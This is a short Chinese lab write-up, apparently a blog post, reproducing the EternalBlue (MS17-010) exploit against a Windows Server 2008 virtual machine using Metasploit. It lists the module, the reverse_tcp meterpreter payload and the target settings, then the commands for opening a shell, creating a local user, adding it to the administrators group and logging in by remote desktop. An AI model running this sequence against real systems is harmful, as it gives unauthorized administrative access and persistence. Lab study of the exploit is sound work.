永恒之蓝ms10-010漏洞复现

攻击机kali 192.168.182.129

靶机win2008 192.168.182.128

msfconsole进入msf

search ms17-010 搜索可利用漏洞,这里使用序号为0

use 0 其中Nopayload configured一行表示使用反向链接 windows/x64/meterpreter/reverse_tcp默认路径

可以使用show payloads展开进行选择其他路径不选就默认为上面的路径

show options 显示攻击载荷所必须填写的信息

其中 Current Setting列为未知 需要自己填写(set)

Required列为是否为必须填写内容

比如RHOSTS行,内容为空 但为yes,所以必须手动填写内容,而SMBDomain就无需理会

设置RHOSTS(目标主机地址 LHOST为自己主机地址)

set RHOSTS 192.168.182.128

show targets 查看可攻击目标操作系统 如果不选择,系统会每个遍历一次,会增加时间

这里已知为win2008 

set target 3

run或者exploit 执行

出现meterpreter代表成功

输入shell创建会话 但发现有乱码

chcp 65001 使其不产生乱码

到这里已经成功进入win2008,尝试创建用户

先看看本地用户都有哪些

net user [用户名] [密码] /add    这是添加用户指令

net user test0002 123456 /add 

报错,意思是密码不符合策略组设置(太简单了),那就大小写数字特殊字符都加上

net user test0002 123Qwe! /add

ok成功

net user 查看一下用户

发现test0002

net localgroup administrators test0002 /add 将test0002加入到win2008的本地管理员组中,有权限啦

成功!

net localgroup administrators 再确定一下 查看本地管理员组中有没有

用户就创建完了

切回win2008登录试试

有test0002

也可以远程桌面尝试

rdesktop 192.168.182.128

完事后会再次确认一下,输入yes就好

看看自己权限

结束!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

  • 5
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值